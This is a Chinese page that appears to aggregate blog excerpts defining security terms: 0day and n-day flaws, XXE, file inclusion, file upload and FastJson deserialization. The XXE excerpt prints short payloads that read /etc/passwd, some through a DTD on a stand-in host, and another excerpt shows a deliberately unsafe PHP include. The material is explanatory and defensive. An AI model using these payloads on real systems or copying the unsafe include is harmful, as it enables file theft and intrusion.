精华内容
下载资源
问答
  • 0day漏洞什么意思啊?

    千次阅读 2016-07-10 17:29:00
    在报纸上看到xx又爆出0day漏洞什么意思? day漏洞,是已经发现但是官方还没发布补丁的漏洞。 信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息。 ...

    在报纸上看到xx又爆出0day漏洞是什么意思?

    day漏洞,是已经发现但是官方还没发布补丁的漏洞。

    信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息。

    http://baike.baidu.com/view/1123216.htm

    展开全文
  • 0-day漏洞,1-day漏洞,n-day漏洞各自是什么意思

    万次阅读 多人点赞 2020-02-03 16:04:34
    0-day,就是只有你知道的一个漏洞! 1-day,就是刚刚公布的漏洞(没有超过一天)。 n-day,就是这个漏洞已经公布出来了N天啦! 来自《0day安全:软件漏洞分析技术(第2版)》 0 day : 0 day 是网络安全技术中...

     

    0-day,就是只有你知道的一个漏洞!

    1-day,就是刚刚公布的漏洞(没有超过一天)。

    n-day,就是这个漏洞已经公布出来了N天啦!

    来自《0day安全:软件漏洞分析技术(第2版)》

    0 day :

    0 day 是网络安全技术中的一个术语,特指被攻击者掌握却未被软件厂商修复的系统漏洞。
    0 day 漏洞是攻击者入侵系统的终极武器,资深的黑客手里总会掌握几个功能强大的 0 day
    漏洞。
    0 day 漏洞是木马、病毒、间谍软件入侵系统的最有效途径。
    由于没有官方发布的安全补丁,攻击者可以利用0 day对目标主机为所欲为,甚至在Internet
    上散布蠕虫。因此,0 day 漏洞的技术资料通常非常敏感,往往被视为商业机密。
    对于软件厂商和用户来说,0 day 攻击是危害最大的一类攻击。
    针对 0 day 漏洞的缓冲区溢出攻击是对技术性要求最高的攻击方式。
    世界安全技术峰会 Black Hat 上每年最热门的议题之一就是“zero day attack/defense”。微
    软等世界著名的软件公司为了在其产品中防范“zero day attack”,投入了大量的人力、物力。
    全世界有无数的信息安全科研机构在不遗余力地研究与 0 day 安全相关的课题。
    全世界也有无数技术精湛的攻击者在不遗余力地挖掘软件中的 0 day 漏洞。

    1 day:

    此外,微软的安全中心所公布的漏洞也是所有安全工作者和黑客们最感兴趣的地方。微软
    每个月第二周的星期二发布补丁,这一天通常被称为“Black T uesday”,因为会有许多攻击者
    通宵达旦地去研究这些补丁 patch 了哪些漏洞,并写出 exploit。因为在补丁刚刚发布的一段时
    间内,并非所有用户都能及时修复,故这种新公布的漏洞也有一定利用价值。有时把攻击这种
    刚刚被 patch 过的漏洞称为 1 day 攻击。
    (patch 发布后 1 天,叫做 1 day,5 天叫做 5 day,未发 patch 统称 0 day)

     

    展开全文
  • 什么是XXE漏洞

    千次阅读 2019-08-12 23:22:34
    漏洞解释 XML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文件使其具体结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括XML...

    漏洞解释

    XML外部实体注入(XML External Entity)简称XXE漏洞,XML用于标记电子文件使其具体结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括XML声明,DTD文档类型定义,文档元素.

    常见的XML语法结构如下所示

    <?xml version="1.0"?>XML声明
    <!DOCTYPE note [
    <!ELEMENT note(to,from,heading,body)>
    <!ELEMENT to(#PCDATA)>
    <!ELEMENT from(#PCDATA)>            文档定义类型(DATA)
    <!ELEMENT heading(#PCDATA)>
    <!ELEMENT body(#PCDATA)>
    ]>
    <note>
    <to>tove</to>
    <from>jani</from>
    <heading>reminder</heading>
    <body>don't forget me this weekend</body>            文档元素
    </note>

    XML语法结构

    其中.文档类型定义(DTD)可以是内部声明也可以引用外部DTD,如下所示

    1. 内部声明DTD格式:<!DOCTYPE 根元素 [元素声明]>
    2. 引用外部DTD格式:<!DOCTYPE 根元素 SYSTEM"文件名"> 

    在DTD中进行实体声明时,将使用ENTITY关键词来声明,实体是用于定义引用普通文本或特殊字符的快捷方式的变量,实体可在内部或外部进行声明,如下所示

    1. 内部声明实体格式:<!ENTITY 实体名称 "实体的值">
    2. 引用外部实体格式:<!ENTITY 实体名称 SYSTEMT "URL">

    漏洞利用方式

    XXE漏洞也叫XXE实体注入,那么如果构建注入呢?

    方式一:内部声明DTD格式

    <?xml version="1.0"?>
    <!DOCTYPE a [
        <! ENTITY b SYSTEM "file:///etc/passwd">
    ]>
    <c>&b;</c>

    方式二:引用外部DTD格式

    <?xml version="1.0"?>
    <!DOCTYPE a SYSTEM "http://test.com/evil.did">
    <c>&b;</c>
    
    //DTD文件内容如下所示
    <!ENTITY b SYSTEM "file:///etc/passwd">

    方式三:引用外部实体格式

    <?xml version="1.0"?>
    <!DOCTYPE a[
    <!ENTITY % d SYSTEM "http://test.com/evil.did">
    ]>
    <c>&b;</c>
    
    //DTD文件内容如下所示
    <!ENTITY b SYSTEM "file:///etc/passwd">

    漏洞危害

    1. 远程命令执行
    2. 读取任意文件
    3. 探测内网端口
    4. 攻击内网网站

    漏洞防御

    1. 使用开发语言提供的禁止外部实体的方法
    2. 过滤用户提交的XML数据

    xxe漏洞的学习与利用总结

    XXE(XML外部实体注入)漏洞

    展开全文
  • 什么是文件包含漏洞

    千次阅读 2019-08-12 10:06:42
    漏洞解释: File inclusion(文件包含漏洞)是一种常见的依赖于脚本运行而影响web应用程序的漏洞,许多脚本语言支持使用包含文件(include file),这种功能允许开发者把可使用的代码插入到单个文件中,在需要的时候将他们...

    漏洞解释:

    File inclusion(文件包含漏洞)是一种常见的依赖于脚本运行而影响web应用程序的漏洞,许多脚本语言支持使用包含文件(include file),这种功能允许开发者把可使用的代码插入到单个文件中,在需要的时候将他们包含在特殊功能的代码中,然后,包含文件中的代码被解释,就好像它们插入到包含指令的位置一样,当应用程序使用攻击者控制的变量建立一个可执行代码的路径,允许攻击者在运行时执行那个文件时,就会导致文件包含漏洞

    漏洞分类:

    本地文件包含:

    本地文件包含(LFI Local File Inclusion)

    有时,应用程序根据用户可控制的数据加载包含文件,但这时不可能给外部服务器上的文件指定url.例如,如果用户可控制的数据被提交给ASP函数Server.Execute,那么攻击者就可以就可以执行任意一段ASP脚本,只要这段脚本属于调用这个函数的相同应用程序

    可以造成的危害:

    1. 访问一些通过正常途径无法访问的敏感文件
    2. 敏感信息泄露

    远程文件包含:

    远程文件包含(RFI Remote File Inclusion)

    PHP语言特别容易出现文件包含漏洞,因为它的包含函数接受远程文件路径

    以一个向不同位置的人传送各种内容的应用程序为例,用户选择他们的位置后,这个信息通过一个请求参数传送给服务器,代码如下:

    //请求如下:
    //https://www.test.com/main.php?Country=US
    //应用程序通过以下方式处理Country参数
    $country=$_GET['Country'];
    include($country . '.php');

    这使执行环境加载位于web服务器文件系统中的US.php文件,然后,这个文件的内容被复制到main.php文件中,并得以执行.

    攻击者能够以各种方式利用这种行为,最严重的情况是指定一个外部的url作为包含文件的位,php包含函数接受这个位置作为输入,接着,执行环境将获取指定的文件并执行内容.

    漏洞危害:

    1:web服务器的文件被外界浏览导致信息泄露

    2:

    脚本被任意执行所造成的影响,典型影响如下:

    1. 篡改网站
    2. 执行非法操作
    3. 攻击其他网站

    参考链接:文件包含漏洞

    展开全文
  • 什么是cgi漏洞

    千次阅读 2017-11-16 11:43:15
    CGI是Common Gateway Inerface(公用网关接口)的简称,并不特指一种语言。...CGI语言漏洞分为以下几类:配置错误、边界条件错误、访问验证错误、来源验证错误、输入验证错误、策略错误、使用错误等等。CGI漏洞大多分
  • 什么是文件上传漏洞

    2019-08-12 11:49:10
    漏洞原理 由于程序员在对用户文件上传功能实现代码上没有严格限制用户上传的文件后缀以及文件类型或者处理缺陷,而导致用户可以越过其本身权限向服务器上上传可执行的动态脚本文件: 简单的来说: 服务器端没有对...
  • 基线一般指配置和管理系统的详细描述,或者说是最低的安全要求,包括服务和...漏洞是在系统实现或系统安全策略上存在的缺陷,例如应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误,这个缺陷或错误可以被
  • 【安全】什么是0day漏洞

    千次阅读 2020-09-19 21:32:44
    什么是0day漏洞? 0day漏洞是指负责应用程序的程序员或供应商所未知的软件缺陷。因为该漏洞未知,所以没有可用的补丁程序。 换句话说,该漏洞是由不直接参与项目的人员发现的。术语“0day”是指从发现漏洞到对其...
  • 什么是FastJson中AutoType反序列化漏洞?

    千次阅读 2020-06-30 15:08:23
    文章目录频繁出现的反序列化漏洞parse()及parseObject()AutoType及安全校验AutoType安全校验AutoType黑名单机制SafeMode安全机制攻击思路反序列化攻击模拟TemplatesImpl攻击调用链路攻击类Translet生成构造攻击JSON...
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ 阿里云漏洞响应平台:https://security.alibaba.com/ i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应...
  • 简单分析什么是SQL注入漏洞

    千次阅读 2014-05-13 10:09:02
    现在很多人在入侵的过程中基本都是通过SQL注入来完成的,但是有多少人知道为什么会有这样的注入漏洞呢?有的会随口说着对于字符的过滤不严造成的。但是事实是这样吗?我们学这些,不仅要知其然,更要知其所以然!...
  • 后门与漏洞什么区别?近年爆发的勒索病毒案例中,被黑客利用的是Windows的后门、还是漏洞? 后门,是一个系统的作者故意留下的、只有作者自己知道的机关。 比如,一个洞府看起来是铜墙铁壁,但是若在它前面前...
  • 格式化字符串漏洞利用时计算的偏移到底是什么? 我们平时在自己题或者是看大佬们的wp时都会看见这种说法 说法一: 说法二: 相信有不少半路出家的小白都和我一样都只是知其然不知其所以然,那这里所说的“偏移”...
  • 漏洞术语

    千次阅读 2020-01-13 21:01:55
    漏洞术语 1.Unicode漏洞 Unicode是一个16位的字符集,他可以移植到所有主要的计算机平台并且覆盖几乎整个世界。微软IIS4和5都存在利用扩展Unicode字符取代“/”“\”而能利用“…/”目录便利的漏洞。未经授权的...
  • 文件解析漏洞

    千次阅读 2018-09-25 08:40:27
    文件解析漏洞 IIS解析漏洞 目录解析漏洞(/test.asp/1.jpg) 文件名解析漏洞(test.asp;.jpg) 畸形解析漏洞(test.jpg/*.php) 其他解析漏洞 Ngnix解析漏洞 畸形解析漏洞(test.jpg/*.php) %00空字节代码解析漏洞 ...
  • 什么是sql注入,xss漏洞

    千次阅读 2018-05-30 14:22:10
    XSS(Cross Site Script)跨站脚本攻击,指恶意攻击者往web页面插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页面时,嵌入其中的web里面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的。...
  • 解析漏洞

    2018-03-07 20:01:40
    解析漏洞正如其名,一般大家常说的是,文件在某种格式下,会被执行为该脚本语言的文件。文件上传漏洞通常与Web容器的解析漏洞配合利用常见Web容器有IIS、Nginx、Apache、Tomcat等好了正文开始汇总了,反正都转载贴的...
  • OpenSSL相关漏洞

    千次阅读 2019-05-31 14:09:48
    心脏出血漏洞(CVE-2014-0160) OpenSSL CCS注入漏洞(CVE-2014-0224) OpenSSL FREAK Attack漏洞(CVE-2015-0204) TLS/SSL协议RC4算法漏洞(CVE-2013-2566) SSLv3 POODLE攻击信息泄露漏洞(CVE-2014-3566) 关于...
  • web漏洞之越权漏洞

    2020-12-20 00:16:24
    越权漏洞十分常见,属于 OWASP TOP10的漏洞类型之一 作为一个常见的逻辑漏洞,越权漏洞的危害和影响与对应业务的重要性成正相关 越权漏洞的挖掘常常要求白帽子足够的细心,每一个可能产生问题的业务点都考虑到了权限...
  • 漏洞复现

    千次阅读 2019-07-19 23:15:42
    CMS漏洞复现 Dedecms v5.7 sp2版本tpl.php存在代码执行漏洞,可以利用该漏洞在增加的新的标签中上传木马。开启PHP study,创建数据库,通过网页访问搭建环境,因为是后台漏洞,所以登陆到后台,构造payload成功写入...
  • XXE漏洞

    千次阅读 2018-08-31 14:05:21
     XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定...
  • 典型漏洞汇总-解析漏洞

    千次阅读 2021-06-02 13:30:07
    典型漏洞汇总-解析漏洞 总览说明 服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在。在此记录汇总一些常见服务器(WEB server)的解析漏洞,比如 IIS6.0、IIS7.5、apache、nginx 等方便以后回顾温习。 from:...
  • WEB漏洞挖掘技术

    万次阅读 2016-02-19 10:09:32
    前言漏洞挖掘技术一直是网络攻击者最感兴趣的问题,漏洞挖掘的范围也在随着技术的提升而有所变化.在前期针对缓冲区溢出 格式化字符串 堆溢出 lib库溢出等技术都是针对ELF文件(Linux可执行文件)或者PE文件(Win可执行...
  • 服务器解析漏洞

    千次阅读 2018-06-23 10:44:30
    服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在。在此记录汇总一些常见服务器的解析漏洞,比如IIS6.0、IIS7.5、apache、nginx等方便以后回顾温习。(一)IIS5.x-6.x解析漏洞使用iis5.x-6.x版本的服务器,...
  • fbm是什么意思_fba是什么意思

    千次阅读 2020-06-10 14:33:05
    所以我一直认为FBM作为大家前期的模式是再好不过的了,有了经验,有了资本,有了受挫能力,我们再去囤货再去发FBA仓FBA模式,可以帮我们省去一大笔不必要的损失。即使你在中途发现跨境电商这个行业不合适自己,FBM...
  • 在刚开始接触网络安全的时候就经常看到 “0day” 这个词,也时常听到学长学姐提到“0day”这个词,后来决定学习渗透测试了,在一些论坛里还是经常看到“0day”这个词,一直也不知道什么意思。昨天就专门查了查,才...
  • MongoDB未授权访问漏洞

    千次阅读 2020-07-24 11:40:51
    文章目录一、漏洞介绍1.1 漏洞成因1.2 漏洞危害二、漏洞利用三、防御建议 一、漏洞介绍 1.1 漏洞成因   MongoDB服务安装后,默认未开启权限验证。且端口对外开放MongoDB服务。 1.2 漏洞危害   攻击者无需认证...
  • 二进制漏洞:传统的缓冲区溢出、UAF(Use-After-Free)等涉及二进制编码的漏洞统称为二进制漏洞 根据缓冲区所处的不同内存空间以及分配方式的不同,缓冲区溢出可以分为栈溢出和堆溢出 栈溢出原理: 栈是一种基本的...
  • ASP.NET漏洞

    千次阅读 2017-06-04 01:13:51
    前不久微软安全响应中心发布了一处asp.NET新安全漏洞,但是针对本安全漏洞分析及解决方案很少,盛大创新院产品开发部研究员赵劼最近就此安全漏洞发表了一篇博文,与大家分享他对本漏洞的一些分析及解决方案。...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 44,087
精华内容 17,634
关键字:

做漏洞是什么意思